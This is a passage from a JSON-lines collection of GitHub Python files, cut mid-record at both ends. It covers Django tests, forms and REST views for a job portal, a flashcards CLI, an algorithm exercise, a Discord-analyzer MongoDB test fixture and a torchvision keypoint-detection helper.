).decode()\n\n result = ffmpeg_output[:64]\n return {\n ChecksumType.RAW_FILE: result,\n }\n\n\ndef check_valid_checksum_output(output, ext):\n if ext in {'.m4a'}:\n assert output.keys() == {ChecksumType.PCM_S24LE}\n elif ext in {'.dsf'}:\n assert output.keys() == {ChecksumType.RAW_STREAM}\n elif ext in {'.iso'}:\n assert output.keys() == {ChecksumType.RAW_FILE}\n else:\n raise ValueError\n\n result = list(output.values())[0]\n assert len(result) == 64\n for c in result:\n assert c in '0123456789abcdef'\n","repo_name":"zym1010/roost_music_management","sub_path":"roost/metadata/checksum/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"21612007876","text":"from django.test import TestCase, Client\n\n\nclass AboutURLTests(TestCase):\n\n def setUp(self):\n # Создаем неавторизованный клиент\n self.guest_client = Client()\n\n def test_urls_available(self):\n \"\"\"URL-адресы доступны для всех.\"\"\"\n urls_200 = (\n '/about/author/',\n '/about/tech/',\n )\n url_404 = '/about/unexisting_page/'\n for address in urls_200:\n response = self.guest_client.get(address)\n self.assertEqual(response.status_code, 200)\n response = self.guest_client.get(url_404)\n self.assertEqual(response.status_code, 404)\n\n def test_urls_templates(self):\n \"\"\"URL-адрес использует соответствующий шаблон.\"\"\"\n templates_url_names = {\n '/about/author/': 'about/author.html',\n '/about/tech/': 'about/tech.html',\n }\n for address, template in templates_url_names.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address)\n self.assertTemplateUsed(response, template)\n","repo_name":"NnExe/YaTube","sub_path":"yatube/about/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"74840363109","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom djinn_forms.fields.share import ShareField\nfrom djinn_forms.forms.share import ShareMixin\nfrom djinn_workflow.utils import (\n get_workflow, get_state, apply_transition, set_state)\nfrom pgauth.models import UserGroup\nfrom pgauth.settings import OWNER_ROLE_ID, EDITOR_ROLE_ID, \\\n PROFILE_TYPE_DEPARTMENT_ID\nfrom djinn_forms.fields.role import LocalRoleSingleField\nfrom djinn_forms.fields.relate import RelateField\nfrom djinn_forms.fields.keyword import KeywordField\nfrom djinn_forms.widgets.relate import RelateSingleWidget, RelateWidget\nfrom djinn_forms.forms.relate import RelateMixin\nfrom djinn_forms.widgets.datetimewidget import DateTimeWidget\nfrom djinn_contenttypes import settings\nfrom pgauth.util import get_usergroups_by_user\n\n\nclass PartialUpdateMixin(object):\n\n partial_support = True\n\n def update(self, commit=True):\n\n \"\"\" Allow for updates of only the fields available in the form \"\"\"\n\n for f in self.instance._meta.fields:\n if f.attname in self.fields:\n setattr(self.instance, f.attname,\n self.cleaned_data[f.attname])\n if commit:\n try:\n self.instance.save()\n except:\n return False\n return self.instance\n\n\nclass MetaFieldsMixin(object):\n\n \"\"\" This mixin actually honours the fields setting of the meta info \"\"\"\n\n def __iter__(self):\n\n for name in [name for name in self.fields if\n name in self._meta.fields]:\n yield self[name]\n\n\nclass BaseForm(PartialUpdateMixin, forms.ModelForm):\n\n user_support = True\n\n def __init__(self, *args, **kwargs):\n\n try:\n partial = kwargs.pop('partial')\n except:\n partial = False\n\n try:\n user = kwargs.pop(\"user\")\n except:\n user = None\n\n super(BaseForm, self).__init__(*args, **kwargs)\n\n if partial:\n self.fields = dict((fname, field) for fname, field in\n self.fields.items() if\n fname in self.data.keys())\n\n self.user = user\n\n class Meta:\n exclude = [\"creator\", \"changed_by\"]\n\n\nclass BaseSharingForm(BaseForm, RelateMixin, ShareMixin):\n\n owner = LocalRoleSingleField(\n OWNER_ROLE_ID,\n [\"pgprofile.userprofile\"],\n # Translators: Contentype owner label\n label=_(\"Owner\"),\n required=False,\n widget=RelateSingleWidget(\n attrs={'searchfield': 'title_auto',\n # Translators: content type owner hint\n 'hint': _(\"Select a name\")\n })\n )\n\n shares = ShareField(\n EDITOR_ROLE_ID,\n [\"pgprofile.userprofile\", \"pgprofile.groupprofile\"],\n # Translators: Contentype shares/editors label\n label=_(\"Editors\"),\n # Translators: content shares help\n help_text=_(\"Select users or groups to share editing role\"),\n required=False,\n widget=RelateWidget(\n attrs={'searchfield': 'title_auto',\n # Translators: content type owner hint\n 'hint': _(\"Select a user or group name \")\n })\n )\n\n def __init__(self, *args, **kwargs):\n\n super(BaseSharingForm, self).__init__(*args, **kwargs)\n\n if not self.instance.get_owner(fail_silently=True) and self.user:\n self.fields['owner'].initial = self.user.profile\n self.fields['owner'].widget.initial = True\n\n\nclass BaseContentForm(BaseSharingForm):\n\n # Translators: contenttypes title label\n title = forms.CharField(label=_(\"Title\"),\n max_length=255,\n widget=forms.TextInput())\n\n # Translators: contenttypes usergroup label\n parentusergroup = forms.ModelChoiceField(label=_(\"Add to group\"),\n required=False,\n queryset=UserGroup.objects.none())\n\n\n publish_from = forms.DateTimeField(\n # Translators: contenttypes publish_from label\n label=_(\"Publish from\"),\n # Translators: contenttypes publish_from help\n help_text=_(\"Enter a publish-from date and time\"),\n required=False,\n widget=DateTimeWidget(\n attrs={'date_hint': _(\"Date\"),\n 'time_hint': _(\"Time\"),\n 'direct': True,\n 'date_format': settings.DEFAULT_DATE_INPUT_FORMAT\n }\n )\n )\n\n publish_to = forms.DateTimeField(\n # Translators: contenttypes publish_to label\n label=_(\"Publish to\"),\n # Translators: contenttypes publish_to help\n help_text=_(\"Enter a publish-to date and time\"),\n required=False,\n widget=DateTimeWidget(\n attrs={'date_hint': _(\"Date\"),\n 'time_hint': _(\"Time\"),\n 'date_format': settings.DEFAULT_DATE_INPUT_FORMAT}\n )\n )\n\n state = forms.ChoiceField(\n # Translators: contenttypes status label\n label=_(\"Status\"),\n # Translators: contenttypes publish_to help\n help_text=_(\"Enter a publish-to date and time\"),\n choices=[],\n required=False,\n widget=forms.RadioSelect)\n\n userkeywords = KeywordField(\n # Translators: contenttypes userkeywords label\n label=_(\"Keywords\"),\n required=False,\n # Translators: contenttypes userkeywords help\n help_text=_(\"Enter keywords separated by spaces\"),\n )\n\n related = RelateField(\n \"related_content\",\n [],\n # Translators: contenttypes related label\n label=_(\"Related content\"),\n required=False,\n # Translators: Translators: contenttypes related hint\n help_text=_(\"Select related content\"),\n widget=RelateWidget(\n attrs={'hint': _(\"Search relation\"),\n 'searchfield': 'title_auto',\n 'template_name':\n 'djinn_forms/snippets/relatesearchwidget.html',\n 'search_url': '/content_search/', },\n )\n )\n\n def __init__(self, *args, **kwargs):\n\n super(BaseContentForm, self).__init__(*args, **kwargs)\n\n self.init_relation_fields()\n self.init_share_fields()\n\n self.fields['parentusergroup'].queryset = self._group_queryset()\n self.fields['parentusergroup'].choices = self._group_choices()\n\n self.fields['userkeywords'].show_label = True\n\n wf = get_workflow(self.instance)\n\n state = get_state(self.instance)\n if state.name != 'public':\n self.fields['state'].initial = \"on\"\n else:\n self.fields['state'].initial = None\n\n if not state:\n state = wf.initial_state\n\n self.fields['state'].choices = [\n (trans.name, trans.name) for trans in\n state.get_transitions(self.instance, self.user)]\n\n # If there is no parentusergroup in the instance, and the instance is\n # a temporary one, set the group to -1.\n # abuse the title field to assure it is really temporary.\n #\n if not self.instance.parentusergroup and self.instance.is_tmp and not self.instance.title:\n self.initial['parentusergroup'] = -1\n\n if 'description_feed' in self.fields:\n self.fields['description_feed'].widget.attrs.update({\n 'placeholder': _(\n \"Geef hier de samenvatting voor infoschermen. Indien \"\n \"niets ingevuld komt hier een ingekorte versie van het \"\n \"tekst-veld.\"\n )\n })\n\n def _group_queryset(self):\n\n if self.user and self.user.is_superuser:\n groups = UserGroup.objects.all()\n elif self.user:\n groups = get_usergroups_by_user(self.user)\n else:\n groups = UserGroup.objects.none()\n\n groups = groups.exclude(profile_type=PROFILE_TYPE_DEPARTMENT_ID)\n\n # # if we already have a group set, add it.\n # #\n # if self.instance.parentusergroup:\n # groups = groups | UserGroup.objects.filter(\n # pk=self.instance.parentusergroup_id)\n #\n # # if the user is in a usergroup page and add permissions were granted:\n # if self.data.get('parentusergroup', False):\n # groups = groups | UserGroup.objects.filter(\n # pk=self.data.get('parentusergroup'))\n\n groups = groups.filter(is_system=False,\n name__isnull=False).exclude(name=\"\").distinct()\n return groups\n\n def _group_choices(self):\n\n \"\"\"Populate group selector. This adds the special case '-1' for no\n selection made, so we can make sure the user needs to either\n select a group, or select 'no group'.\n \"\"\"\n groups = self._group_queryset()\n\n groups_as_options = [(group.id, str(group)) for group in groups]\n # sorting must be done here since groups is a combination of 2 queries\n groups_as_options = sorted(groups_as_options, key=lambda x: x[1].lower())\n\n return [\n # First 2 choices always on top\n # Translators: djinn_contenttypes group make a choice label\n (\"-1\", _(\"Make a choice\")),\n # Translators: djinn_contenttypes group no group label\n ((\"\", _(\"Do not add to a group\")))] + \\\n groups_as_options\n\n def save(self, commit=True):\n\n res = super(BaseContentForm, self).save(commit=commit)\n\n # if the instance is created, set initial state, else apply\n # transition\n #\n # if self.instance.is_tmp and \"state\" in self.changed_data:\n if self.instance.is_tmp:\n if self.cleaned_data['state'] == \"make_private\":\n set_state(self.instance, \"private\")\n if \"state\" in self.changed_data:\n del self.changed_data[self.changed_data.index('state')]\n\n if commit and \"state\" in self.changed_data:\n\n apply_transition(self.instance, self.cleaned_data['state'])\n\n # Op de een of andere manier wordt de owner nergens gezet. Dan\n # maar hier\n if commit and 'owner' in self.cleaned_data.keys() and self.cleaned_data['owner']:\n self.instance.set_owner(self.cleaned_data['owner'].user)\n\n self.save_relations(commit=commit)\n self.save_shares(commit=commit)\n\n return res\n\n def clean(self):\n\n super(BaseContentForm, self).clean()\n\n _data = self.cleaned_data\n\n # Check publication sanity\n #\n if _data.get('publish_to') and _data.get('publish_from'):\n if _data.get('publish_to') < _data.get('publish_from'):\n raise forms.ValidationError(\n _(u\"Publish to date should be after publish from date\"),\n code='invalid')\n\n if _data.get('publish_from') == None and self.data.get('radiodirect') == \"NotDirect\":\n raise forms.ValidationError(\n (\"\"),\n code='invalid')\n\n # Remove after publish requires the publish_to date to be set\n #\n if self.cleaned_data.get('remove_after_publish_to') and \\\n not self.cleaned_data.get('publish_to'):\n raise forms.ValidationError(_(u\"You must set the publish to date\"))\n\n return self.cleaned_data\n\n def clean_parentusergroup(self):\n\n \"\"\"The parentusergroup requires some special attention: it is not\n required, but users need to make that choice explicitly. \"\"\"\n\n group = self.cleaned_data.get('parentusergroup')\n\n if group == -1:\n if group == -1:\n # Translators: djinn_contenttypes parentusergroup required\n raise forms.ValidationError(_(u\"Make a choice\"))\n\n return group\n","repo_name":"PythonUnited/djinn_contenttypes","sub_path":"djinn_contenttypes/forms/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":12005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"43160148150","text":"from django.shortcuts import render\nfrom .models import Company,Jobs,SkillForJobs\nfrom rest_framework import filters\nfrom Candidate.models import(\n JobenquiryC\n)\nimport requests\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django.shortcuts import render, get_object_or_404\nfrom rest_framework.permissions import AllowAny\n\nfrom rest_framework.decorators import (\n api_view,\n permission_classes,\n)\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializers import companyserializer,jobserializer,jobReadserializer,ResultSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework import viewsets\nfrom Candidate.models import (\n Recruit\n)\nfrom Candidate.serializers import(\n ApplicationSerializer\n)\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework import generics\n\nclass Companyprofile(APIView):\n permission_classes = [IsAuthenticated]\n authentication_classes = (TokenAuthentication,)\n def post(self, request, *args, **kwargs):\n context={}\n data={}\n if request.user.Is_Organization == 1:\n serializer = companyserializer(data=request.data)\n if serializer.is_valid():\n serializer.save(User=self.request.user)\n context['sucess']=True\n context['status']=200\n context['message']=\"sucessfully created\"\n data=serializer.data\n context['data']=data\n return Response(context)\n else:\n context['sucess']=False\n context['status']=400\n context['message']=\"error\"\n data=serializer.errors\n context['data']=data\n return Response(context)\n\n else:\n return Response( status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, *args, **kwargs):\n if request.user.Is_Organization == 1:\n context={}\n data={}\n try:\n obj=get_object_or_404(Company,User=request.user)\n except:\n context['sucess']=False\n context['status']=404\n context['message']=\"profile not created\"\n context['data']=data\n return Response(context)\n\n serializer = companyserializer(obj)\n context['sucess']=True\n context['status']=200\n context['message']=\"already exist\"\n data=serializer.data\n context['data']=data\n return Response(context)\n\n def put(self, request, *args, **kwargs):\n if request.user.Is_Candidate == 1:\n obj=get_object_or_404(Company,User=request.user)\n serializer = companyserializer(obj,data=request.data)\n context={}\n data={}\n if serializer.is_valid():\n serializer.save(User=self.request.user)\n context['sucess']=True\n context['status']=200\n context['message']=\"sucessfully done\"\n data=serializer.data\n context['data']=data\n return Response(context)\n context['sucess']=False\n context['status']=400\n context['message']=\"not done\"\n data=serializer.errors\n context['data']=data\n return Response(context)\n\n\nclass jobviewset(viewsets.ModelViewSet):\n serializer_class = jobserializer\n queryset=Jobs.objects.all()\n permission_classes = [IsAuthenticated]\n authentication_classes = (TokenAuthentication,)\n\n http_method_names=['get','post','put','delete']\n def create(self, request,*kwargs):\n context={}\n data={}\n user=self.request.user\n companyobj=Company.objects.get(User=request.user)\n serializer=jobserializer(data=request.data, context={'request':request})\n if serializer.is_valid():\n profile=serializer.save(by=companyobj)\n print(profile)\n context['sucess']=True\n context['response']=\"sucessfull\"\n text=serializer.validated_data['Job_Descreption']\n url=\"http://sihml.pythonanywhere.com/analysis/skills-get/\"\n params = {'Txt': text}\n response = requests.post(url, data=params)\n print(response.json())\n x=Jobs.objects.get(id =profile.id)\n print(x)\n for i in response.json():\n obj,c=SkillForJobs.objects.get_or_create(Name=i)\n print(obj)\n x.SkillRequired.add(obj)\n x.save()\n context['status']=200\n data=serializer.data\n context['data']=data\n return Response(context)\n else:\n return Response(serializer.errors)\n\n\n def list(self, request,*kwargs):\n context={}\n data={}\n user=self.request.user\n companyobj=get_object_or_404(Company,User=user)\n queryset=Jobs.objects.filter(by=companyobj)\n context['sucess']=True\n context['status']=200\n context['response']=\"sucessfull\"\n serializer = jobserializer(queryset,many=True)\n data=serializer.data\n context['data']=data\n return Response(context)\n def post(self,request,*kwargs):\n context={}\n data={}\n user=self.request.user\n companyobj=get_object_or_404(Company,User=user)\n serializer=jobserializer(data=request.data)\n if serializer.is_valid():\n serializer.save(by=companyobj)\n context['sucess']=True\n context['response']=\"sucessfull\"\n context['status']=200\n data=serializer.data\n context['data']=data\n return Response(context)\n\n\n@api_view(['POST', ])\n@permission_classes((AllowAny, ))\ndef Recommendedjobs(request):\n if request.method=='POST':\n serializer=ResultSerializer(data=request.data)\n if serializer.is_valid():\n first=serializer.data['first']\n Second=serializer.data['Second']\n third=serializer.data['third']\n fourth=serializer.data['fourth']\n final=Jobs.objects.none().distinct()\n print(first , Second , third , fourth, )\n jobsqs=Jobs.objects.all()\n print(jobsqs)\n jobsqscount=jobsqs.count()\n first_ratio=0.4*jobsqscount\n Second_ratio=0.3*jobsqscount\n third_ratio=0.2*jobsqscount\n fourth_ratio=0.1*jobsqscount\n final=Jobs.objects.none().distinct()\n final=final|Jobs.objects.filter(SubDomain=first)[:first_ratio]\n final=final|Jobs.objects.filter(SubDomain=first)[:Second_ratio]\n final=final|Jobs.objects.filter(SubDomain=first)[:third_ratio]\n final=final|Jobs.objects.filter(SubDomain=first)[:fourth_ratio]\n finalqs=jobReadserializer(final,many=True)\n data={}\n context={}\n context['sucess']=True\n context['status']=200\n context['count']=jobsqscount\n context['message']=\"sucessfull get\"\n data=finalqs.data\n context['data']=data\n return Response (context)\n else:\n context['sucess']=False\n context['status']=401\n context['message']=serializer.errors\n context['data']=data\n return Response (context)\n\n\n\nclass AllJobViews(generics.ListCreateAPIView):\n queryset=Jobs.objects.all()\n serializer_class = jobReadserializer\n search_fields = ['^job_title','by__Name']\n filter_backends = (filters.SearchFilter,)\n def list(self,request,*args,**kwargs):\n self.object_list=self.filter_queryset(self.get_queryset())\n serializer=self.get_serializer(self.object_list,many=True)\n context={}\n data={}\n context['sucess']=True\n context['status']=200\n context['response']=\"sucessfull\"\n context['count']=self.object_list.count()\n data=serializer.data\n context['data']=data\n return Response(context)\n\n@api_view(['GET', ])\n@permission_classes((IsAuthenticated, ))\ndef list_of_application(request,id):\n context={}\n data={}\n if request.user.Is_Organization==0:\n context['sucess']=False\n context['status']=400\n context['message']=\"unsucessfull get\"\n context['data']=data\n return Response(context)\n\n obj=get_object_or_404(Jobs,pk=id)\n if request.user == obj.by.User:\n qs=JobenquiryC.objects.filter(job=obj).order_by(\"-similarity\")\n context['sucess']=True\n context['status']=200\n context['message']=\"sucessfull get\"\n context['count']=qs.count()\n serializer=ApplicationSerializer(qs,many=True)\n data=serializer.data\n context['data']=data\n return Response(context)\n else:\n context['sucess']=False\n context['status']=400\n context['message']=\" unauthorised acess\"\n context['data']=data\n return Response(context)\n\n","repo_name":"HarshilShrivastava/SIH-Backend","sub_path":"Hackathon/Organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9302,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"37445019701","text":"import io\nimport random\nimport argparse\n\n\nclass Flashcards:\n def __init__(self, output, import_file, export_file):\n self.cards = {}\n self.output = output\n self.import_file = import_file\n self.export_file = export_file\n\n def menu(self):\n if self.import_file is not None:\n self.import_cards(self.import_file)\n while True:\n self.my_print('Input the action (add, remove, import, export, ask, exit, log, hardest card, reset stats):')\n command = input()\n self.my_print(command, console=False)\n if command == \"add\":\n self.add_card()\n elif command == \"remove\":\n self.remove_card()\n elif command == \"import\":\n self.import_cards()\n elif command == \"export\":\n self.export_cards()\n elif command == \"ask\":\n self.ask_cards()\n elif command == \"exit\":\n print('Bye bye!')\n if self.export_file is not None:\n self.export_cards(self.export_file)\n break\n elif command == 'log':\n self.custom_log()\n elif command == \"hardest card\":\n self.hardest_cards()\n elif command == \"reset stats\":\n self.reset_stats()\n self.my_print('')\n\n def custom_log(self):\n self.my_print(\"File name:\")\n file_name = input()\n self.my_print(file_name, console=False)\n with open(file_name, \"w\") as f:\n f.write(self.output.getvalue())\n print('The log has been saved.')\n\n def reset_stats(self):\n for i in self.cards.values():\n i[1] = 0\n self.my_print(\"Card statistics have been reset.\")\n\n def hardest_cards(self):\n if len(self.cards) == 0:\n hardest_card = 0\n else:\n hardest_card = max([mistakes for definition, mistakes in self.cards.values()])\n if hardest_card == 0:\n self.my_print(\"There are no cards with errors.\")\n else:\n hardest_card_dict = dict(filter(lambda elem: elem[1][1] == hardest_card, self.cards.items()))\n data = list(hardest_card_dict.values())\n if len(hardest_card_dict) == 1:\n name_hardest_card = next(iter(hardest_card_dict.keys()))\n self.my_print(f'The hardest card is \"{name_hardest_card}\". You have {hardest_card} errors answering it')\n else:\n str_terms = [f'\"{term}\"' for term, mistakes in data]\n hardest_card_str = ', '.join(str_terms)\n self.my_print(f\"The hardest cards are {hardest_card_str}.\")\n\n def add_card(self):\n self.my_print('The card:')\n term = input()\n self.my_print(term, console=False)\n while True:\n if term in self.cards.keys():\n self.my_print(f'The card \"{term}\" already exists. Try again:')\n term = input()\n self.my_print(term, console=False)\n continue\n break\n self.my_print('The definition of the card:')\n definition = input()\n self.my_print(definition, console=False)\n while True:\n definitions = [data[0] for data in self.cards.values()]\n if definition in definitions:\n self.my_print(f'The definition \"{definition}\" already exists. Try again:')\n definition = input()\n self.my_print(definition, console=False)\n continue\n break\n self.cards[term] = [definition, 0]\n self.my_print(f'The pair (\"{term}\":\"{definition}\") has been added')\n\n def remove_card(self):\n self.my_print('Which card?')\n term = input()\n self.my_print(term, console=False)\n try:\n self.cards.pop(term)\n except KeyError:\n self.my_print(f\"Can't remove \\\"{term}\\\": there is no such card.\")\n else:\n self.my_print('The card has been removed.')\n\n def import_cards(self, file_name=None):\n if file_name is None:\n self.my_print(\"File name:\")\n file_name = input()\n self.my_print(file_name, console=False)\n try:\n with open(file_name, 'r') as file:\n lines = file.readlines()\n for line in lines:\n term, definition, mistakes = line.split()\n self.cards[term] = [definition, int(mistakes)]\n if len(lines) > 0:\n self.my_print(f\"{len(lines)} cards have been loaded.\")\n except FileNotFoundError:\n self.my_print('File not found.')\n\n def export_cards(self, file_name=None):\n if file_name is None:\n self.my_print(\"File name:\")\n file_name = input()\n self.my_print(file_name, console=False)\n with open(file_name, 'w', encoding=\"utf-8\") as file:\n for term, data in self.cards.items():\n file.write('{0} {1} {2}\\n'.format(term, data[0], data[1]))\n self.my_print(f\"{len(self.cards)} cards have been saved\")\n\n def ask_cards(self):\n self.my_print(\"How many times to ask?\")\n count = int(input())\n self.my_print(str(count), console=False)\n for _ in range(count):\n term = random.choice(list(self.cards.keys()))\n definition = self.cards[term][0]\n definitions = [data[0] for data in self.cards.values()]\n self.my_print(f'Print the definition of \"{term}\":')\n answer = input()\n self.my_print(answer, console=False)\n if answer == definition:\n self.my_print('Correct!')\n else:\n if answer in definitions:\n index = definitions.index(answer)\n list_terms = list(self.cards)\n self.my_print(f'Wrong. The right answer is \"{definition}\", '\n f'but your definition is correct for \"{list_terms[index]} card.\"')\n else:\n self.my_print(f'Wrong. The right answer is \"{definition}\".')\n self.cards[term][1] += 1\n\n def my_print(self, message: str, console=True) -> None:\n if console:\n print(message)\n print(message, file=self.output)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--import_from\")\n parser.add_argument(\"--export_to\")\n args = parser.parse_args()\n import_file = args.import_from\n export_file = args.export_to\n output = io.StringIO()\n my_cards = Flashcards(output, import_file, export_file)\n my_cards.menu()\n output.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NikolayRudko/My_Flashcards","sub_path":"flashcards.py","file_name":"flashcards.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72037795430","text":"# 보충 교수님 코드\n\n# 백만장자 프로젝트\n# 뒤에서부터 최댓값을 비교하여 최댓값이 갱신될 때 까지 차이를 이윤으로 누적하는 방식\n# 1개씩만 살 수 있으니까 앞에 더 큰 값이 나오면 무조건 그 날에 파는것이 이득이라서..!!(?맞게 이해한건지는 모르겠음)\n\nimport sys\nsys.stdin = open(\"1859.txt\")\n\n# 인덱스 연습\n# 오른쪽으로 오는 것도 이해 못할 정도로 복잡한 코드 아니니.....!!\n# 설명을 들었을 때 아~~ 그렇게 구현하면 되겠구나 하고 구현할 수 있을 정도로 연습이 되어있어야 한다\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n cost = list(map(int, input().split()))\n\n s = 0 # 총 이익\n maxV = cost[N-1] # 마지막 날 가격으로 초기화\n\n for i in range(N-2, -1, -1):\n if maxV > cost[i]: # 이익을 남길 수 있는 경우\n s += maxV - cost[i]\n maxV = max(maxV, cost[i])\n print(f'#{tc} {s}')\n\n\n\n'''\n# im시험의 주 목적 : 인덱스 연습\n# 시간초과 - im수준에서는 시간초과는 잘 안나긴 함... # 모든구간에서의 최대값 찾기\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n cost = list(map(int, input().split()))\n\n s = 0 # 총 이익\n\n for i in range(N-1): # 물건 구입으 고려하는 날(마지막날은 제외)\n maxV = cost[i+1] #팔수있는 구간의 첫번째날 가격\n for j in range(i+2, N): # 팔 수 있는 모든 날 중에\n if maxV < cost[j]:\n maxV = cost[j]\n if cost[i] < maxV:\n s += maxV - cost[i] # i날 물건을 사서 이익을 남길 수 있으면...\n print(f'#{tc} {s}')\n'''","repo_name":"chan-bam/Algorithm-Study","sub_path":"swea/swea1859-백만장자 프로젝트-.py","file_name":"swea1859-백만장자 프로젝트-.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"6269305229","text":"from datetime import datetime, timedelta\nfrom typing import Optional\n\nimport numpy as np\nfrom bson.objectid import ObjectId\nfrom discord_analyzer.DB_operations.mongodb_access import DB_access\n\n\ndef setup_db_guild(\n db_access: DB_access,\n guildId: str = \"1234\",\n discordId_list: list[str] = [\"973993299281076285\"],\n discordId_isbot: list[bool] = [False],\n dates: Optional[list[datetime]] = None,\n days_ago_period: int = 30,\n):\n \"\"\"\n Remove the guild from Core databse and then insert it there\n also drop the guildId database and re-create\n it then create the guildmembers collection in it\n\n `discordId_isbot` is representative if each user is bot or not\n \"\"\"\n platform_id = \"515151515151515151515151\"\n\n db_access.db_mongo_client[\"Core\"][\"platforms\"].delete_one(\n {\"_id\": ObjectId(platform_id)}\n )\n db_access.db_mongo_client.drop_database(guildId)\n\n action = {\n \"INT_THR\": 1,\n \"UW_DEG_THR\": 1,\n \"PAUSED_T_THR\": 1,\n \"CON_T_THR\": 4,\n \"CON_O_THR\": 3,\n \"EDGE_STR_THR\": 5,\n \"UW_THR_DEG_THR\": 5,\n \"VITAL_T_THR\": 4,\n \"VITAL_O_THR\": 3,\n \"STILL_T_THR\": 2,\n \"STILL_O_THR\": 2,\n \"DROP_H_THR\": 2,\n \"DROP_I_THR\": 1,\n }\n db_access.db_mongo_client[\"Core\"][\"platforms\"].insert_one(\n {\n \"_id\": ObjectId(platform_id),\n \"name\": \"discord\",\n \"metadata\": {\n \"id\": guildId,\n \"icon\": \"111111111111111111111111\",\n \"name\": \"A guild\",\n \"selectedChannels\": [\"1020707129214111827\"],\n \"window\": {\"period_size\": 7, \"step_size\": 1},\n \"action\": action,\n \"period\": datetime.now() - timedelta(days=days_ago_period),\n },\n \"community\": ObjectId(\"aabbccddeeff001122334455\"),\n \"disconnectedAt\": None,\n \"connectedAt\": (datetime.now() - timedelta(days=days_ago_period + 10)),\n \"isInProgress\": True,\n \"createdAt\": datetime(2023, 11, 1),\n \"updatedAt\": datetime(2023, 11, 1),\n }\n )\n\n if dates is None:\n dates_using = np.repeat(\n datetime.now() - timedelta(days=10), len(discordId_list)\n )\n else:\n dates_using = dates\n\n # just to create the data we're inserting one by one\n # it's not the most efficient way\n\n # if the isBot parameters was not set\n # set all the users to not to be a bot\n if len(discordId_isbot) != len(discordId_list):\n user_data = zip(discordId_list, [False] * len(discordId_list))\n else:\n user_data = zip(discordId_list, discordId_isbot)\n\n for idx, (discordId, isbot) in enumerate(user_data):\n db_access.db_mongo_client[guildId][\"guildmembers\"].insert_one(\n {\n \"discordId\": discordId,\n \"username\": f\"sample_user_{idx}\",\n \"roles\": [\"1012430565959553145\"],\n \"joinedAt\": dates_using[idx],\n \"avatar\": \"3ddd6e429f75d6a711d0a58ba3060694\",\n \"isBot\": isbot,\n \"discriminator\": \"0\",\n }\n )\n","repo_name":"TogetherCrew/discord-analyzer","sub_path":"tests/integration/utils/remove_and_setup_guild.py","file_name":"remove_and_setup_guild.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11503560942","text":"import torch, torch.nn, torchvision, numpy as np\nimport cv2\n\ndef get_resnet50():\n from torchvision.models.detection import \\\n fasterrcnn_resnet50_fpn_v2, \\\n FasterRCNN_ResNet50_FPN_V2_Weights\n from torchvision.models.detection import \\\n keypointrcnn_resnet50_fpn, \\\n KeypointRCNN_ResNet50_FPN_Weights\n\n if 0:\n weights = FasterRCNN_ResNet50_FPN_V2_Weights.DEFAULT\n model = fasterrcnn_resnet50_fpn_v2(\n weights=weights,\n box_score_thresh=.9).eval().cuda()\n model.weights = weights\n else:\n weights = KeypointRCNN_ResNet50_FPN_Weights.COCO_V1\n model = keypointrcnn_resnet50_fpn(\n weights=weights,\n box_score_thresh=.9).eval().cuda()\n model.weights = weights\n\n return model\n\ndef run_model(model, img):\n with torch.no_grad():\n x = torch.from_numpy(img).cuda().float().div_(255).unsqueeze_(0).permute(0,3,1,2)\n x = model.weights.transforms()(x)\n return model(x)\n\ndef get_coco_skeleton():\n skeletonVertices_ = {\n 0: 'eye',\n 1: 'ear',\n 2: 'shoulder',\n 3: 'elbow',\n 4: 'hand',\n 5: 'hip',\n 6: 'knee',\n 7: 'foot' }\n\n skeletonVertices = {\n 0: 'nose',\n }\n skeletonVertices.update({k*2+1: 'l_'+v for k,v in skeletonVertices_.items()})\n skeletonVertices.update({k*2+2: 'r_'+v for k,v in skeletonVertices_.items()})\n skeletonVerticesInv = {v:k for k,v in skeletonVertices.items()}\n\n skeletonIndices_ = [\n 'nose', 'l_eye',\n 'l_eye', 'l_ear',\n 'l_ear', 'l_shoulder',\n 'l_shoulder', 'l_elbow',\n 'l_elbow', 'l_hand',\n 'l_shoulder', 'l_hip',\n 'l_hip', 'l_knee',\n 'l_knee', 'l_foot',\n\n 'nose', 'r_eye',\n 'r_eye', 'r_ear',\n 'r_ear', 'r_shoulder',\n 'r_shoulder', 'r_elbow',\n 'r_elbow', 'r_hand',\n 'r_shoulder', 'r_hip',\n 'r_hip', 'r_knee',\n 'r_knee', 'r_foot',\n\n 'l_shoulder', 'r_shoulder',\n 'l_hip', 'r_hip' ]\n skeletonIndices = [\n (skeletonVerticesInv[a],skeletonVerticesInv[b]) for a,b in \\\n zip(skeletonIndices_[0::2], skeletonIndices_[1::2],)\n ]\n\n return skeletonIndices, 